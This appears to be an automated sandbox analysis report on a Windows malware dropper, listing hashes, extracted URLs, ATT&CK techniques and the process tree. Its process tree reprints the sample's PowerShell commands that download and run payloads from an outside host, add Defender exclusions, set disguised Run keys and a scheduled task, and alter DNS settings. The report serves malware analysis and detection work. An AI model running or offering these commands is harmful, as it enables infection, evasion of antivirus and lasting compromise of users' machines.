527d880364a9ac1bd164abf1e2670de97fec74cbca3b9416bd5e54a52c272daa

General

Target

5f282f5a94845d5f5d9e01a56850977d.exe
Size

151KB
MD5

5f282f5a94845d5f5d9e01a56850977d
SHA1

bcf7d29f3f8a07501bd446b8af76f94365de1003
SHA256

527d880364a9ac1bd164abf1e2670de97fec74cbca3b9416bd5e54a52c272daa
SHA512

a84d8d88829bc4f2db3a2c4fa86cc383ccf28b13efc8bd89378175c6f49e5403460b08679bbe89a6073f637fb4c4277c05e88edef7e2b15904e7a5ac01f1da07
SSDEEP

3072:50udufErHlYJYgGviswYAyDDlbiQTYzafJkAWbW2:SMMGTRvDxbiTPAWr

Score

10^/10

persistence

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://cothdesigns2.com:443/obieznne.msi

Extracted

Language

ps1

Source

URLs

exe.dropper

http://cothdesigns2.com:443/KMS_Tool.msi

Extracted

Language

ps1

Source

URLs

exe.dropper

http://cothdesigns2.com:443/cmd.msi

exe.dropper

http://cothdesigns2.com:443/xmlo.msi

Signatures

Adds policy Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\GoogleUpdateTask = "C:\\ProgramData\\Google\\software_reporter_tool.exe"	reg.exe

Blocklisted process makes network request 4 IoCs

flow	pid	Process
13	3692	powershell.exe
14	228	powershell.exe
15	4320	powershell.exe
45	4320	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	5f282f5a94845d5f5d9e01a56850977d.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdateTask = "C:\\ProgramData\\Google\\software_reporter_tool.exe"	reg.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3616	schtasks.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
5004	reg.exe
4612	reg.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
1664	5f282f5a94845d5f5d9e01a56850977d.exe
1664	5f282f5a94845d5f5d9e01a56850977d.exe
1664	5f282f5a94845d5f5d9e01a56850977d.exe
1664	5f282f5a94845d5f5d9e01a56850977d.exe
2840	powershell.exe
3436	powershell.exe
1664	5f282f5a94845d5f5d9e01a56850977d.exe
4212	powershell.exe
228	powershell.exe
3692	powershell.exe
4320	powershell.exe
4320	powershell.exe
2840	powershell.exe
2840	powershell.exe
4212	powershell.exe
4212	powershell.exe
3436	powershell.exe
3436	powershell.exe
228	powershell.exe
228	powershell.exe
3692	powershell.exe
3692	powershell.exe
4320	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	1664	5f282f5a94845d5f5d9e01a56850977d.exe
Token: SeDebugPrivilege	2840	powershell.exe
Token: SeDebugPrivilege	3436	powershell.exe
Token: SeDebugPrivilege	4212	powershell.exe
Token: SeDebugPrivilege	228	powershell.exe
Token: SeDebugPrivilege	3692	powershell.exe
Token: SeDebugPrivilege	4320	powershell.exe

Suspicious use of WriteProcessMemory 26 IoCs

description	pid	Process	procid_target
PID 4212 wrote to memory of 4748	4212	powershell.exe	98
PID 4212 wrote to memory of 4748	4212	powershell.exe	98
PID 2840 wrote to memory of 2092	2840	powershell.exe	99
PID 2840 wrote to memory of 2092	2840	powershell.exe	99
PID 1664 wrote to memory of 4680	1664	5f282f5a94845d5f5d9e01a56850977d.exe	100
PID 1664 wrote to memory of 4680	1664	5f282f5a94845d5f5d9e01a56850977d.exe	100
PID 2092 wrote to memory of 4744	2092	cmd.exe	101
PID 2092 wrote to memory of 4744	2092	cmd.exe	101
PID 4748 wrote to memory of 5004	4748	cmd.exe	103
PID 4748 wrote to memory of 5004	4748	cmd.exe	103
PID 4680 wrote to memory of 3288	4680	cmd.exe	104
PID 4680 wrote to memory of 3288	4680	cmd.exe	104
PID 4212 wrote to memory of 4996	4212	powershell.exe	105
PID 4212 wrote to memory of 4996	4212	powershell.exe	105
PID 4996 wrote to memory of 4612	4996	cmd.exe	106
PID 4996 wrote to memory of 4612	4996	cmd.exe	106
PID 2840 wrote to memory of 4808	2840	powershell.exe	108
PID 2840 wrote to memory of 4808	2840	powershell.exe	108
PID 4808 wrote to memory of 2856	4808	cmd.exe	107
PID 4808 wrote to memory of 2856	4808	cmd.exe	107
PID 4320 wrote to memory of 60	4320	powershell.exe	123
PID 4320 wrote to memory of 60	4320	powershell.exe	123
PID 60 wrote to memory of 3616	60	cmd.exe	124
PID 60 wrote to memory of 3616	60	cmd.exe	124
PID 4320 wrote to memory of 5012	4320	powershell.exe	125
PID 4320 wrote to memory of 5012	4320	powershell.exe	125

C:\Users\Admin\AppData\Local\Temp\5f282f5a94845d5f5d9e01a56850977d.exe
"C:\Users\Admin\AppData\Local\Temp\5f282f5a94845d5f5d9e01a56850977d.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1664
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\5f282f5a94845d5f5d9e01a56850977d.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4680
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:3288

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd.exe /c netsh interface ipv4 set dns name=Ethernet static 8.8.8.8;cmd.exe /c netsh interface ipv4 add dns name=Ethernet 8.8.4.4 index=2
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2840
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c netsh interface ipv4 set dns name=Ethernet static 8.8.8.8
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2092
- - C:\Windows\system32\netsh.exe
    netsh interface ipv4 set dns name=Ethernet static 8.8.8.8
    3⤵
    PID:4744
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c netsh interface ipv4 add dns name=Ethernet 8.8.4.4 index=2
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\Temp';Add-MpPreference -ExclusionPath 'C:\ProgramData\Google\software_reporter_tool.exe';Add-MpPreference -ExclusionProcess 'InstallUtil.exe';Add-MpPreference -ExclusionProcess 'software_reporter_tool.exe';Add-MpPreference -ExclusionProcess 'svchost.exe';Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE';Add-MpPreference -ExclusionPath 'C:\ProgramData\Google\GoogleUpdate.exe';Add-MpPreference -ExclusionProcess 'powershell.exe';Add-MpPreference -ExclusionProcess 'cmd.exe';Add-MpPreference -ExclusionProcess 'GoogleUpdate.exe'
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3436

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd.exe /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTask" /t REG_SZ /f /d "C:\ProgramData\Google\software_reporter_tool.exe";cmd.exe /c reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v "GoogleUpdateTask" /t REG_SZ /f /d "C:\ProgramData\Google\software_reporter_tool.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4212
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4748
- - C:\Windows\system32\reg.exe
    reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:5004
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4996
- - C:\Windows\system32\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
    3⤵
    - Adds policy Run key to start application
    - Modifies registry key
    PID:4612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/obieznne.msi','C:\ProgramData\Google\software_reporter_tool.exe');C:\ProgramData\Google\software_reporter_tool.exe
1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/KMS_Tool.msi','C:\Windows\Temp\KMS_Tool.exe');C:\Windows\Temp\KMS_Tool.exe
1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/cmd.msi','C:\ProgramData\Google\GoogleUpdate.exe');(New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/xmlo.msi','C:\Windows\Temp\.xml');cmd.exe /c schtasks /create /xml "C:\Windows\Temp\.xml" /tn "GoogleUpdateTask";cmd.exe /c del "C:\Windows\Temp\.xml"
1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4320
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c schtasks /create /xml C:\Windows\Temp\.xml /tn GoogleUpdateTask
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:60
- - C:\Windows\system32\schtasks.exe
    schtasks /create /xml C:\Windows\Temp\.xml /tn GoogleUpdateTask
    3⤵
    - Creates scheduled task(s)
    PID:3616
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c del C:\Windows\Temp\.xml
  2⤵
  PID:5012

C:\Windows\system32\netsh.exe
netsh interface ipv4 add dns name=Ethernet 8.8.4.4 index=2
1⤵
PID:2856

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

Scheduled Task

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

3

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
235a8eb126d835efb2e253459ab8b089

SHA1
293fbf68e6726a5a230c3a42624c01899e35a89f

SHA256
5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

SHA512
a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4267fc1e87ee23aeb8b9a7d0497091c5

SHA1
59ddae7dc44b8317ff933ad113493eb1644c52c0

SHA256
ff7daa872dda2a5fc4ce7a687bb4193774abb607d489887ffdbbd0ef71bc0d8d

SHA512
1d1b048dc3f01680f4049c23db8e4450f2d59a1174184a340e712d6e4340b3ab6191a254986c98743c5374a693733bfa6ff255b62a7b43809bd79c0804be2beb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
43f4bec966ab901ac034fc136a642fa5

SHA1
8e7227cefec8b05c9a79b2751d1261187b9c0422

SHA256
09ea65cf68920d08638db30c86eb3c90254b9b2d9f73246bc0176c86ce687ae4

SHA512
a65a2fe6acf4cb0dae8361af3e42e35c6bfaa93859e744a7779630d785a56bb030161c92a74b88a223769fdb912911146a762cf6a8afe33642e2695ea08ceec0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4267fc1e87ee23aeb8b9a7d0497091c5

SHA1
59ddae7dc44b8317ff933ad113493eb1644c52c0

SHA256
ff7daa872dda2a5fc4ce7a687bb4193774abb607d489887ffdbbd0ef71bc0d8d

SHA512
1d1b048dc3f01680f4049c23db8e4450f2d59a1174184a340e712d6e4340b3ab6191a254986c98743c5374a693733bfa6ff255b62a7b43809bd79c0804be2beb

Download Submit
memory/228-141-0x00007FFCEED30000-0x00007FFCEF7F1000-memory.dmp

Filesize
10.8MB

Download
memory/228-161-0x00007FFCEED30000-0x00007FFCEF7F1000-memory.dmp

Filesize
10.8MB

Download
memory/228-167-0x00007FFCEED30000-0x00007FFCEF7F1000-memory.dmp

Filesize
10.8MB

Download
memory/1664-135-0x0000023241280000-0x00000232412AC000-memory.dmp

Filesize
176KB

Download
memory/1664-136-0x00007FFCEED30000-0x00007FFCEF7F1000-memory.dmp

Filesize
10.8MB

Download
memory/1664-147-0x00007FFCEED30000-0x00007FFCEF7F1000-memory.dmp

Filesize
10.8MB

Download
memory/2840-138-0x00007FFCEED30000-0x00007FFCEF7F1000-memory.dmp

Filesize
10.8MB

Download
memory/2840-160-0x00007FFCEED30000-0x00007FFCEF7F1000-memory.dmp

Filesize
10.8MB

Download
memory/2840-137-0x000002A7E98A0000-0x000002A7E98C2000-memory.dmp

Filesize
136KB

Download
memory/3436-139-0x00007FFCEED30000-0x00007FFCEF7F1000-memory.dmp

Filesize
10.8MB

Download
memory/3436-153-0x00007FFCEED30000-0x00007FFCEF7F1000-memory.dmp

Filesize
10.8MB

Download
memory/3692-162-0x00007FFCEED30000-0x00007FFCEF7F1000-memory.dmp

Filesize
10.8MB

Download
memory/3692-142-0x00007FFCEED30000-0x00007FFCEF7F1000-memory.dmp

Filesize
10.8MB

Download
memory/3692-166-0x00007FFCEED30000-0x00007FFCEF7F1000-memory.dmp

Filesize
10.8MB

Download
memory/4212-157-0x00007FFCEED30000-0x00007FFCEF7F1000-memory.dmp

Filesize
10.8MB

Download
memory/4212-140-0x00007FFCEED30000-0x00007FFCEF7F1000-memory.dmp

Filesize
10.8MB

Download
memory/4320-148-0x00007FFCEED30000-0x00007FFCEF7F1000-memory.dmp

Filesize
10.8MB

Download
memory/4320-163-0x00007FFCEED30000-0x00007FFCEF7F1000-memory.dmp

Filesize
10.8MB

Download
memory/4320-172-0x00007FFCEED30000-0x00007FFCEF7F1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads